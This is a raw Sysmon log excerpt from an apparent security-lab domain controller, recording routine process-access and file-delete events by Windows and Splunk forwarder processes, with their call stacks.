12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.857{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.857{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.841{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.639{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.639{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.218{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B1D239B3B4CD85B7DDA9A34F5F26D3,SHA256=8C0C558C6F14532B4CE74F6206FABFB9B046A1B956BD92EE5642AC18CC9FA60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.218{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D8F048B8B6F9CC3D33660EFB80CCBB,SHA256=20A174C0A95B8CD8D13133CF9932408D8DD17D47CF9EC646EE38FF14129E32AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.156{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.094{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 